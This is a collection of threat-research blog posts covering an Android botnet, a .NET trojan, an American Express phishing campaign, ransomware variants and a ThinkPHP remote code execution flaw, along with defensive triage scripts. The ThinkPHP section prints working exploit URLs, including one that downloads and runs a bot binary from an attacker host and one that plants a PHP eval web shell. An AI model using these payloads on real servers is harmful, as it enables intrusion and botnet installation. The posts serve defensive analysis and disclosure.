The Android Zazdi botnet uses FCM to communicate with its infected bots

SonicWall Capture Labs Threat Research team received reports of an info-stealer for Android. Upon inspecting related samples and correlating different data points, we discovered this to be a botnet campaign. The campaign is capable of executing 50 commands on infected devices, using Firebase Cloud Messaging (FCM) as the means of communicating with them.

We named this botnet Zazdi because a form on the server side contains this word as its id, and another sample contained the string zazdihicham in reverse.

Infection Cycle:
We identified a Facebook page – hxxps://www.facebook.com/HizaxyTV – that contains links to websites hosting a malicious Android app belonging to this campaign (the link was active at the time of writing this blog):

We identified 2 more such Facebook pages:

  • hxxps://www.facebook.com/windows7emulator – This page has been removed
  • hxxps://www.facebook.com/Windows7Simulator – Links on this page do not work at the moment

Visiting either of the highlighted links led us to a download page for the apk file:

We have shown the analysis of a different app belonging to this campaign – Win7Launcher – to highlight a number of operations for this blog; however, the malicious functionality and motives of all the apps belonging to this campaign are the same.

Upon installation and execution, the app worked as advertised – it actually is a Windows 7 themed launcher:

But soon enough it started malicious activity in the background. The network capture below shows the device registering itself with the attacker’s server, indicating successful infection. Along with this, the malware sends sensitive device information to the server:

  • User email
  • Device manufacturer and model name
  • OS version
  • Location – sent to a specific php page ending in register_location.php 

We saw an interesting variable in the network packet – clipboard. We tested it by copying the string “testing clipboard”; the subsequent network packet contained this string, captured from our clipboard and sent to a page on the server ending in register_clipboard.php:

Soon enough we started seeing shortcuts on our infected device which when clicked led us to other malicious apps belonging to this botnet campaign:

Holes in server-side security:
During our investigation we observed that the C&C server lacked adequate security, which allowed us to access web pages that revealed critical data related to this botnet campaign. Below are a few highlights of our findings:

There are multiple directories on the server based on app names, using these names we could list the different apps that are part of this botnet campaign:

  • Happy Bird Pro (com.hzdi.happybird)
  • Epic Bird (com.hzdi.epicfloppybird)
  • Win7Launcher (com.mobistartapp.windows7launcher)
  • Flappy Bee (com.hzdi.flappybee)
  • Win7imulator (com.ketchupmobile.win7imulator)
  • FlashLight (com.mobistartapp.flashlight)
  • Desktop WLauncher (com.mobistartapp.desktopwlauncher)
  • Hizaxy TV (com.mobistartapp.livetv)
  • HZPermis Pro Arabe (com.mobistartapp.coderoute.hzpermispro.ar)

Interestingly, the apps come with functionality matching their names. For instance, the Win7Launcher app has a Windows 7 launcher theme, and Happy Bird Pro actually contains a bird-themed game. This is not very common, as malicious apps usually do not contain the functionality their name suggests; they usually just execute the malicious code while appearing idle to the user.

As mentioned earlier, once the malicious app is opened on the device, the device gets registered on the server. We found a link that listed users registered via the app Happy Bird Pro. It is worth noting that the page shows 1000 registered devices:

A clearer view of this data can be seen from the source code of this page:


As visible, this looks like a fresh registration – 7th January, 2019.

It is interesting to note that the clipboard functionality is not present in all the apps belonging to this campaign. As visible below, a few apps do not have the page related to clipboard data:

Topics and Firebase Cloud Messaging:
This botnet campaign uses Firebase Cloud Messaging (FCM) to communicate with the apps that have registered after infecting their devices. FCM allows developers to send messages to apps that have opted in to a particular topic, providing an easy means of sending relevant messages to a group of users. For instance, users of a movie app can subscribe to a topic “English movies” to receive alerts about English movies only.

However this can be used for malicious purposes!

During our analysis of apps belonging to this campaign, most of the apps automatically subscribed to a particular topic once installed. One instance is shown below, where our installed app was subscribed to the topic windows7_launcher:

One of the web-pages we discovered on the server was the Firebase dashboard. Using this page an attacker could send commands to apps that are subscribed to a particular topic thereby controlling the operations that can be performed by the infected devices in the botnet. Thanks to the lax security on the server, we could do the same!

The image below shows the combo box used to select a particular app id; we selected the id windows7_launcher as our analysis app had the functionality of a Windows 7 launcher. We filled the Title input box with a test message for experimentation:

We then selected the topic that this app belonged to, as mentioned earlier our analysis app was subscribed to the topic windows7_launcher:

After filling a few more boxes we could finally test our custom alert message by sending it to devices subscribed to this topic:

Success! We received an alert message on our infected device with our custom message:

There are multiple ways in which this notification can be displayed to the user; in our example we displayed it as an alert message. There is an option to display it as a Gmail notification, meaning the victim sees a notification with the Gmail icon and the attacker’s message, fooling the victim into believing they received a Gmail notification. To most users this will look legitimate and they will open the notification, falling victim to the scam. The different options for sending messages/notifications to the victim are listed on the dashboard (we display the “code” version of the website for clarity):

Lastly, there are 50 commands supported by this botnet which can be executed via FCM:


Command Execution Examples:
We executed a few commands via FCM:

Command 20 – FK FB – Fake Facebook login screen

Upon executing this command a fake Facebook login screen popped on our infected device. We entered fake credentials test@gmail.com/testpass:

Soon enough our entered credentials were sent to the server in the background:


Command 22 – Screenshot Current Screen – Takes the screenshot and saves it locally

We saw an alert stating that Win7 Launcher will start capturing everything on the screen (not so stealthy):

The screenshot was captured and saved locally in the app folder under files as myscreenshot:

This highlights the capabilities of this botnet and how easy it is to execute commands from the dashboard and toy with the victims.
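Pulling together the indicators from the sections above (the register_*.php exfiltration endpoints, clipboard access, the automatic FCM topic subscription and the reversed campaign marker) gives an analyst a compact static triage rule. The script below is an added example, not SonicWall’s tooling; the string lists are constructed stand-ins for what `strings` or a decompiler would pull from a decoded APK, and the function and indicator names are assumptions.

```python
"""Static triage of strings pulled from a decoded Android package for the
Zazdi-style indicators described above: registration endpoints, FCM topic
subscription and clipboard access.

Added example, not SonicWall's code. The string samples are constructed;
in practice feed in the output of `strings` over the decoded APK.
"""
import re
from collections import defaultdict

# Each indicator is a compiled pattern; the labels are hypothetical.
INDICATORS = {
    "register_endpoint": re.compile(r"register_[a-z]+\.php", re.I),
    "clipboard_exfil":   re.compile(r"register_clipboard\.php|ClipboardManager", re.I),
    "fcm_topic":         re.compile(r"subscribeToTopic|FirebaseMessaging", re.I),
    "known_topic":       re.compile(r"^windows7_launcher$", re.I),
    "campaign_marker":   re.compile(r"zazdihicham|com\.hzdi\.|com\.mobistartapp\.", re.I),
}


def triage_strings(strings):
    """Return {indicator: [matching strings]} over the given strings.

    Every string is checked as-is and reversed, because one sample stored
    the campaign marker backwards (zazdihicham spelt in reverse).
    """
    hits = defaultdict(list)
    for s in strings:
        for name, pat in INDICATORS.items():
            if pat.search(s) or pat.search(s[::-1]):
                hits[name].append(s)
    return dict(hits)


def verdict(hits):
    """Classify a triage result.

    A registration endpoint together with the FCM topic API is the C2
    pattern of this campaign; clipboard access is optional because not
    every app in the campaign has it. Topic messaging on its own is
    ordinary app behaviour and must not be flagged.
    """
    found = set(hits)
    if {"register_endpoint", "fcm_topic"} <= found:
        return "botnet-like, clipboard-stealer" if "clipboard_exfil" in found else "botnet-like"
    if found <= {"fcm_topic"}:
        return "clean"
    return "suspicious"


# Constructed sample: strings an analyst might see from a Win7Launcher-like app.
SAMPLE_STRINGS = [
    "Lcom/google/firebase/messaging/FirebaseMessaging;",
    "subscribeToTopic",
    "windows7_launcher",
    "/register_location.php",
    "/register_clipboard.php",
    "Landroid/content/ClipboardManager;",
    "mahcihidzaz",          # 'zazdihicham' reversed
    "Windows 7 Launcher",
]

# Constructed sample: a benign app that only uses FCM topics.
BENIGN_STRINGS = [
    "Lcom/google/firebase/messaging/FirebaseMessaging;",
    "subscribeToTopic",
    "english_movies",
]

if __name__ == "__main__":
    for label, strs in (("sample", SAMPLE_STRINGS), ("benign", BENIGN_STRINGS)):
        h = triage_strings(strs)
        print(label, verdict(h), sorted(h))
```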

Closing Thoughts:
Overall, this botnet appears to be active at the moment based on:

  • Date of registration of devices to this campaign
  • Samples related to this campaign (latest one being January 7, 2019)
  • The active links that contain malicious apk files
  • Active Facebook campaign page 

This botnet campaign boasts as many as 50 commands that can be executed on infected devices in a number of different ways designed to seem legitimate. Apart from the active Facebook page, this campaign can spread to other devices by using these commands on the infected devices.

We urge our readers to be wary of such dangerous apps, keep an eye out for suspicious behavior on the device, and take prompt action to keep themselves and their personal data safe.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: AndroidOS.Zazdi.FL
  • GAV: AndroidOS.Zazdi.HTV
  • GAV: AndroidOS.Zazdi.W7
  • GAV: AndroidOS.Zazdi.W7L

The following are a few samples belonging to this campaign:

  • com.mobistartapp.desktopwlauncher – 7dfb7a568fad88e7e92da2ce1ac71483
  • com.mobistartapp.windows7launcher – 1678e81602a1666d602895bf7da04af4
  • com.mobistartapp.hizaxytv.mobile – 386052ccba75e0d9e0d676be865c1f66
  • com.mobistartapp.emulator.windows7 – 01256c189d57af2536e5e26a3aa36bda
  • com.mobistartapp.flashlight – be9bf5750a8639101900b082b8c445ca
  • com.mobistartapp.hzpermisproar.s1 – bfd16f9294674712d40d03f0480b9c82
  • com.hzdi.happybird – 1de491f554dfc0186bde2225b4459474

.NET Trojan: Yubby v1.6 w/[CRM Service]…

Overview:

SonicWall Capture Labs Threat Research team has captured and observed the following sample:

The “Yubby” Trojan is listed as a Trojan, PUA or PUP by many anti-virus vendors and help forums around the internet. The application establishes multiple connections to the IP addresses 88.198.58.40 and 176.9.8.183.

An overview of the behavior (Setup.exe) is listed as:

      • Opens, deletes and modifies multiple files.
      • Downloads, installs and updates files.
      • Opens, creates, modifies and deletes registry keys.
      • Creates and terminates processes.
      • Installs and executes the “CRMSvc” service.
      • The packer and protector use complex obfuscation techniques based on the XOR algorithm.

SHA-256 Hash: d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e

The relationship between the sample and the IP addresses above can be seen as follows:

Sample Static Information:

Unpacking The Sample:

A quick look at the resource section of the sample shows the famous “BEEFCACE” marker. Many keywords like this are used to pinpoint areas in memory. We also see that there is a PE file in the resource section, recognisable by the “MZ” signature a few lines down from “BEEFCACE”.

The main function starts with a lot of XOR’ing of bytes and shifting of pointers. You can see the first of many decryption functions below:

Unfortunately, this is only one of about 200 decryption functions like this that you have to step through in order to dump the array[]. After stepping through the starting function and the others that follow, you arrive at the location where you can dump the array:

Once the sample’s resource has been decrypted, you will see the installed location here:

CRMSvc.exe, Static Information:

The CRM Service .EXE is also a .NET PE File.
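Before moving on to the dropped service binary, the resource-section observations above (the BEEFCACE marker, the MZ signature a few lines after it, and the XOR-based decryption loops) can be turned into a small carving helper for a memory or resource dump. This is an added example, not SonicWall’s code: the resource blob is constructed, the function names are assumptions, and the single-byte XOR recovery is a generic check rather than a statement about this sample’s actual key.

```python
"""Carve an embedded PE from a .NET resource dump by walking from the
BEEFCACE marker to the next plausible MZ/PE header pair, and recover a
single-byte XOR layer if the region is still encoded.

Added example, not SonicWall's code. RESOURCE_BLOB is constructed; the
function names are assumptions, and the XOR recovery is a generic check,
not a statement about this sample's actual key.
"""
import struct

MARKER = b"BEEFCACE"


def find_pe_header(blob, start=0):
    """Offset of the first 'MZ' at/after start whose e_lfanew (DOS header
    offset 0x3C) points at a 'PE\\0\\0' signature, or -1 if none."""
    pos = blob.find(b"MZ", start)
    while pos != -1:
        if pos + 0x40 <= len(blob):
            e_lfanew = struct.unpack_from("<I", blob, pos + 0x3C)[0]
            sig = pos + e_lfanew
            # Sanity bound on e_lfanew keeps random byte pairs from matching.
            if 0x40 <= e_lfanew < 0x1000 and blob[sig:sig + 4] == b"PE\0\0":
                return pos
        pos = blob.find(b"MZ", pos + 1)
    return -1


def carve_after_marker(blob, marker=MARKER):
    """Return (marker_offset, pe_offset); either is -1 when not found."""
    m = blob.find(marker)
    if m == -1:
        return -1, -1
    return m, find_pe_header(blob, m + len(marker))


def xor_bytes(data, key):
    return bytes(b ^ key for b in data)


def recover_single_byte_xor(blob):
    """Try all 256 single-byte keys; return (key, pe_offset) for the first
    key that exposes a valid MZ/PE pair, or None if no key does."""
    for key in range(256):
        off = find_pe_header(xor_bytes(blob, key))
        if off != -1:
            return key, off
    return None


def build_minimal_pe():
    """Constructed stand-in for a PE image: DOS header with e_lfanew=0x40,
    followed by the PE signature and some padding."""
    dos = bytearray(b"MZ" + b"\x00" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, 0x40)
    return bytes(dos) + b"PE\0\0" + b"\x00" * 20


# Constructed resource: junk, the marker, two filler bytes, then the PE.
RESOURCE_BLOB = b"junk" + MARKER + b"\x01\x02" + build_minimal_pe()
# The same blob under a single-byte XOR layer (key chosen for the demo).
ENCODED_BLOB = xor_bytes(RESOURCE_BLOB, 0x5A)

if __name__ == "__main__":
    print(carve_after_marker(RESOURCE_BLOB))      # (4, 14)
    print(recover_single_byte_xor(ENCODED_BLOB))  # (90, 14)
```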

Registry Details

  • “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D105DFE2-8DF6-4BA0-ABF1-392716658963}”

This one registry key gives us a lot of information about the sample:

  • The Display Name
  • Display Version
  • Estimated Size of File
  • Installation Location
  • Publisher
  • Uninstall parameters of the Trojan.

HTTP Network Objects

[Network Object 1]:

[Network Object 2]:

SonicWall Gateway AntiVirus provides protection against this threat:

  • GAV: Gdsda.A ( Trojan )

American Express Phishing Campaign making rounds

SonicWall Capture Labs Threat Research team has observed a new variant of the American Express phishing campaign. It starts with a phishing email pretending to come from American Express Fraud Protection Services. It then asks the user to download the attached PDF document to verify account information. The phishing link in the PDF document takes the user to an attacker web page that looks exactly like American Express. In last week’s phishing campaign, an HTML form was used instead of a phishing web page.

Even though the sender address in this phishing campaign is not from American Express, it just says American Express. The original email id is from the domain “Americ@centralcomwireless.com”. The email’s subject says “Urgent: Request for information”, with the attached PDF payload “Secure Document.pdf”.

A snapshot of the attached PDF is shown below; it asks the user to click on the phishing URL to verify the account activity.

“Click here” goes to “hxxp://tresriosimoveis.com.br/quemsomos/index.html” initially and is later redirected to the phishing web page. It looks like “tresriosimoveis.com.br” has been compromised by the attackers and is used for redirection.

Index.html has the content pasted below, which redirects to the specified URL. The URL also seems to be updated by the attacker, as we have seen it change.

<meta http-equiv="Refresh" content="0; url=https://plantsok.ga/infox/index.html">

The redirected HTTPS URL is a fake site that impersonates American Express. None of the links on this page work except ‘Log In’.
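The hop from the compromised page to the phishing site is a zero-delay meta refresh that leaves the hosting domain, which is cheap to flag when triaging a landing page. The parser below is an added example, not SonicWall’s code; the HTML is constructed around the tag quoted above, and the function names and the `suspicious` rule (zero delay plus a different host) are assumptions.

```python
"""Extract <meta http-equiv="Refresh"> redirects from a landing page and
flag zero-delay hops that leave the hosting domain, the pattern used by
the compromised tresriosimoveis.com.br page described above.

Added example, not SonicWall's code. SAMPLE_HTML is constructed around
the tag quoted in the write-up; function names are assumptions.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class MetaRefreshParser(HTMLParser):
    """Collect (delay_seconds, raw_target) pairs from meta refresh tags."""

    def __init__(self):
        super().__init__()
        self.refreshes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "meta":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("http-equiv", "").strip().lower() != "refresh":
            return
        # content looks like "0; url=https://..." (delay, then optional url=)
        delay_part, _, rest = a.get("content", "").partition(";")
        try:
            delay = float(delay_part.strip() or "0")
        except ValueError:
            return  # malformed content attribute; ignore the tag
        rest = rest.strip()
        if rest.lower().startswith("url="):
            rest = rest[4:].strip().strip("'\"")
        self.refreshes.append((delay, rest))


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def analyze_redirects(page_url, html):
    """Return one dict per meta refresh that actually names a target URL."""
    parser = MetaRefreshParser()
    parser.feed(html)
    results = []
    for delay, target in parser.refreshes:
        if not target:
            continue  # a refresh with no url only reloads the same page
        absolute = urljoin(page_url, target)
        cross_host = host_of(absolute) != host_of(page_url)
        results.append({
            "target": absolute,
            "delay": delay,
            "cross_host": cross_host,
            # Immediate hand-off to another host is the phishing-relay shape.
            "suspicious": delay == 0 and cross_host,
        })
    return results


# Constructed page content built around the tag quoted in the write-up.
SAMPLE_HTML = """<html><head>
<meta http-equiv="Refresh" content="0; url=https://plantsok.ga/infox/index.html">
<title>quem somos</title></head><body></body></html>"""
SAMPLE_PAGE_URL = "http://tresriosimoveis.com.br/quemsomos/index.html"

if __name__ == "__main__":
    for r in analyze_redirects(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(r)
```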

Upon entering the account credentials, it takes us to the next page, which requests the 4-digit card identification number and the 3-digit card security code.

In the final page, it requests to update personal information such as Social Security Number, Security PIN, Mother’s maiden name, Mother’s Birthday, Place of Birth, First elementary school, Email address and Mobile Phone Number.

When done stealing the personal information, it responds with the message “Thank you, your information has been verified.” to look legitimate.

Finally, it lands on the legitimate American Express web page.


SonicWall Capture Advanced Threat Protection (ATP) provides protection against most phishing documents with its multi-engine approach.

Hashes:

PDF: 043459c13f1a4873db3396faf9f15ecc51bab083041c14d8a57f92859309c5f6
Email: 0b18455494f9b85aeaf0e08e6ec672ff490bc292f761a019c83f207b8d11bf26

Phishing URLs:

Both phishing URLs are active at the time of writing.

  • hxxps://entially.ga/infox/indxp.html?sign&accountx/Appli-catitup/Applion$updatenow=&cookiegtcheck/yes&destkcnpage&fefdd
  • hxxps://plantsok.ga/infox/indxp.html?sign&accountx/Appli-catitup/Applion$updatenow=&cookiegtcheck/yes&destkcnpage&fefdd

Recognizing Phishing Emails:

Phishing emails look like legitimate company emails and are designed to steal your information. They usually contain a link to a website that will ask for your login credentials, personal information or financial details. These websites are clever fakes designed to take your information and pass it back to the cybercrooks behind the scam.

In general, if you are not expecting an email from that company, you should be suspicious. Other tell-tale signs of phishing emails are as follows:

  • The email is not addressed to your full name. It will use generic terms like “Dear Customer.”
  • The email contains grammatical or spelling errors.
  • The email asks for personal information.
  • The email contains urgent or threatening language.

If you think you have received a phishing email, do not click on any links or open any attachments. To be sure, log directly into your relevant account to check for updates or messages or contact the company directly through their website.

Take our Phishing Quiz to see if you are able to identify phishing emails.

ShellLocker ransomware variant actively promoting PewDiePie YouTube channel

The SonicWall Capture Labs Threat Research Team has recently observed an unusual form of ransomware based on the ShellLocker source code. Although this variant does damage its victim and contains the usual cryptographic capabilities expected of ransomware, its sole purpose appears to be promoting PewDiePie’s YouTube channel.

Infection Cycle:

Upon infection it displays the following full screen page:

The YouTube link leads to the following page asking the victim to subscribe to PewDiePie’s YouTube channel:


It makes a DNS request for i.imgur.com and issues the following request to download an image:


However, the image is not displayed.

The Trojan adds the following files to the filesystem:

  • %APPDATA%\Local\TempTqykUo3.png (image downloaded from imgur.com)
  • %APPDATA%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe (Detected as: [GAV: PewDiePie.RSM (Trojan)])

It deletes the following directories:

  • C:\Documents and Settings
  • C:\ProgramData\Application Data
  • C:\ProgramData\Desktop
  • C:\ProgramData\Documents
  • C:\ProgramData\Microsoft\Diagnosis\FeedbackHub
  • C:\ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA
  • C:\ProgramData\Microsoft\Windows\SystemData
  • C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Cache
  • C:\ProgramData\Start Menu
  • C:\ProgramData\Templates
  • C:\System Volume Information
  • C:\Users\All Users\Application Data
  • C:\Users\All Users\Desktop
  • C:\Users\All Users\Documents
  • C:\Users\All Users\Microsoft\Diagnosis\FeedbackHub
  • C:\Users\All Users\Microsoft\Diagnosis\TenantStorage\P-ARIA
  • C:\Users\All Users\Microsoft\Windows\SystemData
  • C:\Users\All Users\Microsoft\Windows Defender Advanced Threat Protection\Cache
  • C:\Users\All Users\Start Menu
  • C:\Users\All Users\Templates
  • C:\Users\Default\AppData\Local\Application Data
  • C:\Users\Default\AppData\Local\History
  • C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files
  • C:\Users\Default\AppData\Local\Temporary Internet Files
  • C:\Users\Default\Application Data
  • C:\Users\Default\Cookies
  • C:\Users\Default\Documents\My Music
  • C:\Users\Default\Documents\My Pictures
  • C:\Users\Default\Documents\My Videos
  • C:\Users\Default\Local Settings
  • C:\Users\Default\My Documents
  • C:\Users\Default\NetHood
  • C:\Users\Default\PrintHood
  • C:\Users\Default\Recent
  • C:\Users\Default\SendTo
  • C:\Users\Default\Start Menu
  • C:\Users\Default\Templates
  • C:\Users\Default User
  • C:\Users\\AppData\Local\Application Data
  • C:\Users\\AppData\Local\History
  • C:\Users\\AppData\Local\Microsoft\Windows\INetCache\Content.IE5
  • C:\Users\\AppData\Local\Microsoft\Windows\Temporary Internet Files
  • C:\Users\\AppData\Local\Temporary Internet Files
  • C:\Users\\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles
  • C:\Users\\Application Data
  • C:\Users\\Cookies
  • C:\Users\\Documents\My Music
  • C:\Users\\Documents\My Pictures
  • C:\Users\\Documents\My Videos
  • C:\Users\\Local Settings
  • C:\Users\\My Documents
  • C:\Users\\NetHood
  • C:\Users\\PrintHood
  • C:\Users\\Recent
  • C:\Users\\SendTo
  • C:\Users\\Start Menu
  • C:\Users\\Templates
  • C:\Users\Public\Documents\My Music
  • C:\Users\Public\Documents\My Pictures
  • C:\Users\Public\Documents\My Videos
  • C:\Windows\CSC
  • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Ngc
  • C:\Windows\System32\LogFiles\WMI\RtBackup

The Trojan adds the following keys to the registry:

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bam\UserSettings\S-1-5-21-1139641556-554834077-2527536839-1002 \Device\HarddiskVolume2\Users\<USER>\Documents\<malware filename>.exe hex:f4,e2,99,cc,c4,a3,d4,01,00,00,00,00,00,00,00,00,00,00,00,00,02,00,00,00,
  • HKEY_USERS\S-1-5-21-1139641556-554834077-2527536839-1002\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store C:\Users\<USER>\Documents\<malware filename>.exe

The Trojan modifies the following registry key:

  • HKEY_CURRENT_USER\Control Panel\Desktop WallPaper “C:\Windows\web\wallpaper\Windows\img0.jpg” “C:\Users\<USER>\AppData\Local\TempTqykUo3.png”

In our run of the malware, it did not actually encrypt any files on the system. It does, however, contain the capability to do so. The malware is written in .NET and was fairly trivial to decompile.

It contains code to kill system related processes:


There are 7 copies of the above code that kill the following processes:

  • cmd
  • taskmgr
  • procexp
  • procexp64
  • regedit
  • CCleaner64
  • msconfig

The code uses AES.generateKey() to generate a random encryption key. It will encrypt files on all drives from A through Z:


The following code downloads an image from imgur.com although it fails to display the image:

A search using the text in the above image led us to the ShellLocker source code used for the malware on GitHub:

https://github.com/gr33ntii/malware-collection/tree/master/Ransomware/Shell%20Locker%20-%20Source%20Code/ShellLocker/ShellLocker

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: PewDiePie.RSM (Trojan)

JavaScript being used to distribute GandCrab ransomware

The SonicWall RTDMI engine has recently detected a surge in archive files (~1600-8900 bytes in size) circulating on the network.

The absence of the archive file from popular threat intelligence sharing portals such as VirusTotal and ReversingLabs indicates its uniqueness and limited distribution.


The archive file carries a JavaScript file.

The JavaScript file contains code to download another malware, padded with garbage code. The second-stage malware it downloads is, on further analysis, found to be a downloader.

The second-stage downloader downloads a variant of the popular ransomware family “GandCrab”.

The GANDCRAB family is known for asking ransom from the victim after file encryption.


Evidence of the detection by RTDMI engine can be seen below in the Capture ATP report for this file:


Cyber Security News & Trends – 01-04-19

How long did it take before 2019’s first cyberattack took place? Find out this and more. SonicWall has collected this week’s best cybersecurity stories, just for you.


SonicWall Spotlight

SonicWall Celebrates Key EMEA Milestones  – Enterprise Channels MEA

  • SonicWall’s Michael Berg comments on SonicWall’s boosted presence in EMEA, crediting channel expertise and commitment to speaking the local language as key factors in growth.

Ransomware Attacks Hit Legal System – Today’s General Counsel Magazine

  • An investigation into the growing threat of ransomware in the legal world uses SonicWall 2018 data as its jumping off point.

Cyber Security News

The Elite Intel Team Still Fighting Meltdown and Spectre – Wired

  • The Spectre and Meltdown vulnerabilities were first announced a year ago and made major waves in the news cycle due to their scope and impact. Wired follows up on the story with an in-depth look at how STORM, Intel’s strategic offensive research and mitigation hacker group, has been dealing with the problem.

Town of Salem Breach Affects 7 Million Accounts – SC Magazine

  • Some payment information was exposed in the breach, but the main leak was of usernames, email addresses, hashed passwords, IP addresses, game and forum activity. The developers have stressed that no card numbers were leaked.

What We Still Don’t Know About the Cyberattack on Tribune Newspapers – Washington Post

  • A cyberattack seriously hampered printing several papers owned by Tribune Publishing, including The L.A. Times. While the Tribune group say they suspect the cyberattack originated from abroad, they have given little other information and the identity and motive of attackers remain unclear.

Dublin’s Luas Tram System Threatened With Private Data Leak – ZDNet

  • Dublin’s tram system is hit with what looks like a ransomware attack that threatens to expose online users unless a ransom of one bitcoin is paid.

Your Data Was Probably Stolen in Cyberattack in 2018 – and You Should Care – USA Today

  • Marriott, Quora, Facebook, Dunkin’ Donuts; USA Today summarizes the biggest hacks of 2018 and comes to the conclusion that very few people have escaped unscathed.

German Politicians Targeted in Mass Data Attack  – BBC

  • Hundreds of German politicians, including Chancellor Angela Merkel, had personal details stolen and published on Twitter throughout December. No one has publicly taken responsibility for the attack yet but all parties except those on the far right were affected.

This Data-Stealing Android Malware Infiltrated the Google Play Store, Infecting Users in 196 Countries – ZDNet

  • When an App is first uploaded into the Google Play Store it is subject to tough reviews to ensure it is safe for users, but some malware developers have been taking advantage of less stringent checks later down the line and injecting malware as an update.

2019’s First Data Breach: It Took Less than 24 Hours – CBR Online

  • The first data breach of 2019 was reported less than 24 hours into the New Year when an estimated 30,000 Australian civil servants had work emails, phone numbers and job titles leaked. Thankfully, no financial information is said to have been affected.

In Case You Missed It

ThinkPHP Remote Code Execution (RCE) bug is actively being exploited

ThinkPHP is a web application development framework based on PHP, distributed under the Apache2 open-source license. It focuses on rapid development of enterprise projects and is very popular in China where over 40,000 servers run ThinkPHP.

Vulnerability Overview:

ThinkPHP has recently released a security update to fix an unauthenticated, high-risk remote code execution (RCE) vulnerability. It is due to insufficient validation of the controller name passed in the URL, leading to a possible getshell vulnerability when the forced routing option is not enabled.

ThinkPHP parses the URL query parameters to retrieve the module, controller and function. It then checks whether a class exists for the controller name. If so, it instantiates an object of this class and executes the function passed in the URL.

The URL query given below is parsed using the separator character ‘/’. Ideally a controller class name should not contain ‘\’. Because of the bug, ‘\think\app’ is parsed as the controller class name and ‘invokefunction’ as the function. The framework then creates an instance of the controller class ‘App’ within the ‘think’ namespace and calls the method ‘invokefunction’, which can take an arbitrary function as its argument, allowing threat actors to perform remote code execution.


?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

The same vulnerability allows remote code execution through another controller class in ThinkPHP, ‘Request’. The Request class can be instantiated with the URL below, allowing its cache function to execute the arbitrary function provided as part of the URL query.


?s=index/\think\request/cache&key=1|phpinfo

This is due to the framework’s insufficient validation of the controller name, allowing arbitrary remote code execution or even access to the server.

ThinkPHP has fixed the vulnerability by adding checks on the controller name using a regular expression.
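The difference between the vulnerable and the fixed routing comes down to what is accepted as a controller name. The snippet below is an added example, not ThinkPHP’s or SonicWall’s code: it models the `s=` parameter split in Python, applies an allow-list regular expression of the kind the fix introduced (the exact pattern is an assumption), and reuses the same rule to flag exploit attempts in request URLs such as those shown on this page. Function names and the host are assumptions.

```python
"""Model of ThinkPHP's module/controller/function split on the `s` query
parameter, with the vulnerable (no validation) and fixed (regex allow-list)
behaviour side by side, plus a request-URL check built on the same rule.

Added example, not ThinkPHP's or SonicWall's code. The allow-list pattern
is an assumption about the kind of check the fix adds; function names and
the host in the sample URLs are assumptions too.
"""
import re
from urllib.parse import urlparse, parse_qs

# A controller name should be a plain identifier: no backslash, so a
# namespaced class such as \think\app cannot be smuggled in (assumed rule).
CONTROLLER_RE = re.compile(r"^[A-Za-z](\w|\.)*$")


def split_route(s):
    """Vulnerable parse: split on '/' and take module/controller/function
    without checking what the controller name contains."""
    parts = [p for p in s.split("/") if p]
    module = parts[0] if len(parts) > 0 else "index"
    controller = parts[1] if len(parts) > 1 else "index"
    function = parts[2] if len(parts) > 2 else "index"
    return module, controller, function


def controller_allowed(name):
    return bool(CONTROLLER_RE.match(name))


def resolve_route(s):
    """Fixed parse: same split, but refuse controller names that fail the
    allow-list, which is what stops \\think\\app or think\\app loading."""
    module, controller, function = split_route(s)
    if not controller_allowed(controller):
        raise ValueError("controller name not allowed: %r" % controller)
    return module, controller, function


def is_exploit_attempt(url):
    """True when a request's `s` parameter routes to a controller that the
    fixed check would refuse (usable over access logs or in a WAF hook)."""
    qs = parse_qs(urlparse(url).query, keep_blank_values=True)
    for s in qs.get("s", []):
        _, controller, _ = split_route(s)
        if not controller_allowed(controller):
            return True
    return False


# Constructed host; the query strings follow the requests shown above.
BENIGN = "http://host/index.php?s=index/user/profile&id=7"
ATTACK_LEADING = r"http://host/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id"
ATTACK_NOLEAD = r"http://host/index.php?s=index/think\app/invokefunction&function=call_user_func_array"
ATTACK_REQUEST = r"http://host/index.php?s=index/\think\request/cache&key=1|phpinfo"

if __name__ == "__main__":
    print(split_route(r"index/\think\app/invokefunction"))
    for u in (BENIGN, ATTACK_LEADING, ATTACK_NOLEAD, ATTACK_REQUEST):
        print(is_exploit_attempt(u), u)
```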


Exploit Campaign:

SonicWall Threat Research Lab has observed various attempts to exploit the recently disclosed ThinkPHP RCE vulnerability. It seems to have been adopted by threat actors immediately after public disclosure. The vulnerability is currently being exploited by different threat groups to install botnets and other malicious code on servers running vulnerable versions of ThinkPHP.

Find below some of the URLs observed trying to exploit the ThinkPHP RCE vulnerability:

    1. index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget http://cnc.arm7plz.xyz/bins/set.x86 -O /tmp/.eSeAlg; chmod 777 /tmp/.eSeAlg; /tmp/.eSeAlg thinkphp
    2. index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo'<?php eval($_POST[qazw]);?>’ > result.php
    3. index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r ‘print(“tj”.” tj”);
